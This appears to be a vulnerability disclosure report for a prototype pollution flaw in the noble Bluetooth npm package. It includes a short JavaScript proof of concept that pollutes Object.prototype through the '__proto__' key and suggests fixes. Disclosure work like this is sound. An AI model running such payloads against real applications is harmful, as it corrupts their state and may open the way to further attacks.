Prototype Pollution Vulnerability in noble Package

I would like to report prototype pollution vulnerability in noble. It allows attackers to pollute the Object.prototype object of an application running noble, possibly through Bluetooth. # Module **module name:** noble **version:** 1.9.1 **npm page:** `https://www.npmjs.com/package/noble` ## Module Description A Node.js BLE (Bluetooth Low Energy) central module. Want to implement a peripheral? Checkout bleno Note: macOS / Mac OS X, Linux, FreeBSD and Windows are currently the only supported OSes. Other platforms may be developed later on. ## Module Stats 2,270 downloads in the last week # Vulnerability ## Vulnerability Description An attacker can inject arbitrary properties on Object.prototype using one of the methods exposed by this module. Moreover, there is strong evidence (parameter names) to believe that these values can be controlled remotely by the attacker, through Bluetooth. ## Steps To Reproduce: For now, I only have a local payload, but it seems to me that both the peripheralUuid and serviceUuids, expected by the onServicesDiscover are specified in the Bluetooth standard, thus it may come from another device advertising itself over Bluetooth. However, this scenario needs to be investigated further. ```js var noble = require('noble'); //noble.emit("servicesDiscover"); console.log({}.x); try { noble.onServicesDiscover("__proto__", "x"); } catch(e) {} console.log({}.x); ``` ## Patch N/A validate the property name or initialize the target object using Object.create(null). # Wrap up - I contacted the maintainer to let them know: N - I opened an issue in the related repository: N ## Impact If the attack can indeed by deployed using Bluetooth, this issue is serious, allowing the attacker to inject arbitrary properties from a remote device.